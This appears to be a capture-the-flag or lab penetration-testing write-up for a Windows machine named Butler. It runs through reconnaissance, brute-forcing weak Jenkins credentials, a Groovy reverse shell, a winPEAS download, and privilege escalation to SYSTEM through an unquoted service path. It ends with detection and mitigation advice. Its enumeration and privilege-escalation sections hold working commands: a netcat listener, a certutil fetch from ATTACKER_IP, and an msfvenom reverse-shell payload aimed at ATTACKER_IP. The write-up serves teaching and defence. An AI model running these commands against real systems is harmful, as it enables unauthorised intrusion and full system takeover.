(Note: The non-technical executive summary pdf for the business impact and remediation is also attached in the github repository.)
- Overview
- Executive Summary
- Objectives
- Target Information
- Methodology and Mindset
- Attack Path
- Reconnaissance
- Enumeration
- Initial Exploitation
- Post Exploitation
- Privilege Escalation
- Flag Capture
- Vulnerability Assessment
- Detection Opportunities
- Mitigations and Recommendations
- Final Observations
- References
This assessment demonstrates the compromise of the Butler Windows machine through weak Jenkins credentials and an unquoted service path vulnerability, ultimately resulting in full NT AUTHORITY\SYSTEM access.
The assessment identified two major weaknesses:
- Public exposure of a Jenkins administration interface protected by weak credentials (
jenkins:jenkins). - A Windows service configured with an unquoted executable path and insecure permissions.
An attacker exploiting these issues could:
- Obtain remote administrative access.
- Execute arbitrary commands on the server.
- Deploy malware or ransomware.
- Steal sensitive information.
- Use the server as a pivot point into internal infrastructure.
Business impact includes service disruption, data loss, credential compromise, and potential complete domain compromise if the server is connected to enterprise environments.
- Enumerate exposed services.
- Identify initial access vectors.
- Achieve remote code execution.
- Escalate privileges to SYSTEM.
- Document findings and mitigation recommendations.
| Item | Value |
|---|---|
| Target IP | 192.168.126.137 |
| Operating System | Windows |
| Open Ports | 445, 7680, 8080 |
| Initial User | butler |
| Final Access | NT AUTHORITY\SYSTEM |
Questions followed during the assessment:
- What information do I currently have?
- What assumptions can I make?
- What can I verify?
- What does this information allow me to do next?
- What is the most likely path to compromise?
Recon → Jenkins Discovery → Credential Brute Force
→ Script Console RCE → Reverse Shell
→ winPEAS Enumeration
→ Unquoted Service Path Abuse
→ SYSTEM Shell
nmap -sn 192.168.126.0/24
nmap -sS -A -T4 -p- 192.168.126.137Discovered services:
- TCP/445 – SMB
- TCP/7680 – Windows Update Delivery Optimization
- TCP/8080 – Web Application (Jenkins)
The presence of Jenkins on a non-standard port immediately increased the attack surface. Administrative applications exposed to untrusted networks often become high-value targets.
feroxbuster -u http://192.168.126.137:8080 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-t 500 -r --depth 5 --scan-dir-listingsBrowsing the application revealed a Jenkins login portal.
Administrative panels should always be investigated carefully because they frequently expose management functions capable of executing commands or managing plugins.
Credentials were brute-forced through intercepted login requests:
Username: jenkins
Password: jenkins
Default and weak credentials remain one of the most common causes of compromise and frequently provide direct administrative access.
After authentication, the Manage Jenkins → Script Console functionality was identified.
A Groovy reverse shell script was executed to establish command execution.
Listener:
nc -lvnp 8044Result:
whoami
butlerThe Jenkins Script Console effectively provides code execution on the host. If administrative access is achieved, full server compromise usually follows immediately.
System information gathering:
whoami
systeminfo
cd C:\Users\butlerwinPEAS was transferred:
certutil.exe -urlcache -f http://ATTACKER_IP/winPEASx64.exe winpeas.exeEnumeration is often the most important phase after gaining a shell. Misconfigurations that are not externally visible frequently appear only after local access is obtained.
winPEAS identified:
WiseBootAssistant
No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
Affected path:
C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
An unquoted service path vulnerability allowed execution of a malicious executable placed in a higher directory.
Payload generation:
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=ATTACKER_IP \
LPORT=7777 \
-f exe > wise.exeService manipulation:
sc stop WiseBootAssistant
sc query WiseBootAssistant
sc start WiseBootAssistantResult:
whoami
nt authority\systemUnquoted service paths remain dangerous because they combine privilege escalation and persistence opportunities. Services executing as SYSTEM should always be carefully audited.
whoami
nt authority\systemSYSTEM-level access successfully achieved.
| Vulnerability | Severity | CVSS v3.1 | Business Impact | Notes |
|---|---|---|---|---|
| Weak Jenkins Credentials | High | 8.8 | Remote administrative compromise | Public-facing administrative service |
| Jenkins Script Console Abuse | Critical | 9.8 | Arbitrary command execution | Equivalent to full server compromise |
| Unquoted Service Path | High | 7.8 | Privilege escalation to SYSTEM | Can also enable persistence |
The combination of weak credentials and an unquoted service path created a complete attack chain from unauthenticated network access to full SYSTEM compromise.
- Monitor authentication attempts against Jenkins.
- Alert on execution of Groovy scripts through Jenkins.
- Monitor
certutil.exedownloads. - Monitor creation of executables inside
C:\Program Files. - Alert on service stop/start events involving administrative services.
- Disable default and weak credentials.
- Enforce MFA on administrative services.
- Restrict Jenkins exposure through firewalls.
- Disable Script Console access where possible.
- Quote all Windows service paths.
- Review service permissions and ACLs.
- Implement application allow-listing.
- Monitor administrative service modifications.
This machine demonstrates how seemingly minor weaknesses can be chained into complete system compromise:
- Weak credentials enabled initial access.
- Administrative functionality provided remote code execution.
- Local enumeration revealed a privilege escalation opportunity.
- Misconfigured Windows services resulted in SYSTEM compromise.
The assessment reinforces an important penetration testing principle:
A single low-complexity misconfiguration is rarely catastrophic by itself, but multiple small weaknesses chained together frequently result in full compromise.
- MITRE ATT&CK T1574.009 – Path Interception by Unquoted Path https://attack.mitre.org/techniques/T1574/009/
- PEASS-ng Project https://github.com/peass-ng/PEASS-ng/releases
- OWASP Testing Guide https://owasp.org/www-project-web-security-testing-guide/latest/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies